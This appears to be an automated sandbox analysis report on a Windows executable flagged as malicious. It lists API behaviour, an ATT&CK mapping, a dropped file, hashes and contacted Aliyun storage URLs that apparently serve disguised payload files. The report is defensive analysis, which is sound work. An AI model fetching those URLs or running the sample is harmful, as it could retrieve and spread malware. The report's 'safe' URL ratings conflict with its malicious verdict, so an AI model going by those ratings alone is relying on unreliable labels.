Source: C:\Users\user\Desktop\1387457-38765948.15.exeNtDelayExecution: Indirect: 0x1F94CCJump to behavior
Searches for specific processes (likely to inject)
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_00000001400043D0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,GetCurrentProcessId,Process32NextW,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,CreateToolhelp32Snapshot,Thread32First,CloseHandle,PostThreadMessageW,Thread32Next,CloseHandle,0_2_00000001400043D0
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_000000014000F290 cpuid 0_2_000000014000F290
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_00000001400052E4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00000001400052E4

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API		1
DLL Side-Loading		1
Process Injection		1
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Abuse Elevation Control Mechanism		1
Virtualization/Sandbox Evasion		LSASS Memory251
Security Software Discovery		Remote Desktop ProtocolData from Removable Media2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		1
Process Injection		Security Account Manager1
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Abuse Elevation Control Mechanism		NTDS12
Process Discovery		Distributed Component Object ModelInput Capture3
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets1
Application Window Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials1
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync213
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
1387457-38765948.15.exe8%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\Documents\c4wtKa.exe0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifshangh0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/i.dat0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.giff0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/i.dats0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/o0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifta0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifnet-cn0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifcm.ali0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.giffS0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/d.gif0%Avira URL Cloudsafe
https://yandex.com00%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.giff70%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifW0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/hanghai.aliyuncs.com/0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gifv0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gif;6?0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/i.datC:0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gif0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/-2246122658-3693405117-2476756634-1003R0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gifs0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/-2476756634-10030%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gif0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifIQ0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.giffO0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/K0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gifhttps://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifht0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifY0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifom0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gifom0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/-2476756634-1003?0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gif0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/W0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gifnghai.aliyuncs.com/a.gif0%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.giff70%Avira URL Cloudsafe
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifcn-sha0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
sc-2wln.cn-shanghai.oss-adns.aliyuncs.com.gds.alibabadns.com
47.101.26.25
truefalse
    		unknown
    jcoiw1.oss-cn-shanghai.aliyuncs.com
    		unknown
    		unknownfalse
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://jcoiw1.oss-cn-shanghai.aliyuncs.com/i.datfalse
      • Avira URL Cloud: safe
      		unknown
      https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.giffalse
      • Avira URL Cloud: safe
      		unknown
      https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.giffalse
      • Avira URL Cloud: safe
      		unknown
      https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.giffalse
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.giff1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifshangh1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifcm.ali1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://jcoiw1.oss-cn-shanghai.aliyuncs.com/d.gif1387457-38765948.15.exe, 00000000.00000002.3287821784.000000000014C000.00000004.00000010.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000637000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://crl.microsoft1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpfalse
        		high
        https://jcoiw1.oss-cn-shanghai.aliyuncs.com/i.dats1387457-38765948.15.exe, 00000000.00000002.3287970622.00000000005F0000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://ocsp.thawte.com01387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drfalse
          		high
          https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.giffS1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifnet-cn1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifta1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000609000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.00000000005F0000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://jcoiw1.oss-cn-shanghai.aliyuncs.com/o1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://yandex.com01387457-38765948.15.exefalse
          • Avira URL Cloud: safe
          		unknown
          https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.giff71387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://jcoiw1.oss-cn-shanghai.aliyuncs.com/1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.00000000005F0000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://jcoiw1.oss-cn-shanghai.aliyuncs.com/i.datC:1387457-38765948.15.exe, 00000000.00000002.3287821784.0000000000140000.00000004.00000010.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifW1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.symauth.com/cps0(1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drfalse
            		high
            https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gif;6?1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gifv1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://jcoiw1.oss-cn-shanghai.aliyuncs.com/hanghai.aliyuncs.com/1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://jcoiw1.oss-cn-shanghai.aliyuncs.com/-2246122658-3693405117-2476756634-1003R1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gifs1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifIQ1387457-38765948.15.exe, 00000000.00000002.3287821784.0000000000140000.00000004.00000010.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://jcoiw1.oss-cn-shanghai.aliyuncs.com/K1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifY1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.giffO1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://jcoiw1.oss-cn-shanghai.aliyuncs.com/-2476756634-10031387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gifhttps://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifht1387457-38765948.15.exe, 00000000.00000002.3287821784.000000000014C000.00000004.00000010.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000637000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gifom1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://crl.thawte.com/ThawteTimestampingCA.crl01387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drfalse
              		high
              http://www.symauth.com/rpa001387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drfalse
                		high
                https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifom1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://jcoiw1.oss-cn-shanghai.aliyuncs.com/-2476756634-1003?1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://jcoiw1.oss-cn-shanghai.aliyuncs.com/W1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gifnghai.aliyuncs.com/a.gif1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000609000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.00000000005F0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.giff71387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifcn-sha1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                47.101.26.25
                		sc-2wln.cn-shanghai.oss-adns.aliyuncs.com.gds.alibabadns.comChina
                		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse

                General Information

                Joe Sandbox version:42.0.0 Malachite
                Analysis ID:1589380
                Start date and time:2025-01-12 04:03:12 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 38s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:4
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:1387457-38765948.15.exe
                Detection:MAL
                Classification:mal72.evad.winEXE@1/5@1/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 9
                • Number of non-executed functions: 30
                Cookbook Comments:
                • Found application associated with file extension: .exe

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                22:04:06API Interceptor941x Sleep call for process: 1387457-38765948.15.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd80P.exeGet hashmaliciousI2PRATBrowse
                • 120.26.116.232
                5.elfGet hashmaliciousUnknownBrowse
                • 123.56.46.120
                2976587-987347589.07.exeGet hashmaliciousNitol, XmrigBrowse
                • 118.178.60.103
                2976587-987347589.08.exeGet hashmaliciousNitolBrowse
                • 118.178.60.9
                2976587-987347589.08.exeGet hashmaliciousUnknownBrowse
                • 39.103.20.105
                2976587-987347589.07.exeGet hashmaliciousUnknownBrowse
                • 39.103.20.105
                5.elfGet hashmaliciousUnknownBrowse
                • 139.240.73.120
                4.elfGet hashmaliciousUnknownBrowse
                • 42.120.233.253
                AuKUol8SPU.exeGet hashmaliciousFormBookBrowse
                • 8.136.96.106
                frosty.x86.elfGet hashmaliciousMiraiBrowse
                • 47.110.90.76

                JA3 Fingerprints

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                37f463bf4616ecd445d4a1937da06e19build.exeGet hashmaliciousVidarBrowse
                • 47.101.26.25
                zmpZMfK1b4.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                • 47.101.26.25
                ix8kxoBHDb.exeGet hashmaliciousRemcos, GuLoaderBrowse
                • 47.101.26.25
                b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                • 47.101.26.25
                c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                • 47.101.26.25
                ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                • 47.101.26.25
                grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                • 47.101.26.25
                14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                • 47.101.26.25
                Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                • 47.101.26.25
                lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 47.101.26.25

                Dropped Files

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                C:\Users\user\Documents\c4wtKa.exe2976587-987347589.07.exeGet hashmaliciousNitol, XmrigBrowse
                  2976587-987347589.08.exeGet hashmaliciousNitolBrowse
                    2976587-987347589.08.exeGet hashmaliciousUnknownBrowse
                      2976587-987347589.07.exeGet hashmaliciousUnknownBrowse
                        2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
                          2362476847-83854387.07.exeGet hashmaliciousNitolBrowse
                            2362476847-83854387.07.exeGet hashmaliciousUnknownBrowse
                              2o63254452-763487230.06.exeGet hashmaliciousNitolBrowse
                                2o63254452-763487230.06.exeGet hashmaliciousUnknownBrowse
                                  e2664726330-76546233.05.exeGet hashmaliciousNitolBrowse

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\b[1].gif

                                    Download File
                                    Process:C:\Users\user\Desktop\1387457-38765948.15.exe
                                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                    Category:dropped
                                    Size (bytes):125333
                                    Entropy (8bit):7.993522712936246
                                    Encrypted:true
                                    SSDEEP:3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
                                    MD5:2CA9F4AB0970AA58989D66D9458F8701
                                    SHA1:FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
                                    SHA-256:5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
                                    SHA-512:AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\a[1].gif

                                    Download File
                                    Process:C:\Users\user\Desktop\1387457-38765948.15.exe
                                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                    Category:dropped
                                    Size (bytes):135589
                                    Entropy (8bit):7.995304392539578
                                    Encrypted:true
                                    SSDEEP:3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
                                    MD5:0DDD3F02B74B01D739C45956D8FD12B7
                                    SHA1:561836F6228E24180238DF9456707A2443C5795C
                                    SHA-256:2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
                                    SHA-512:0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
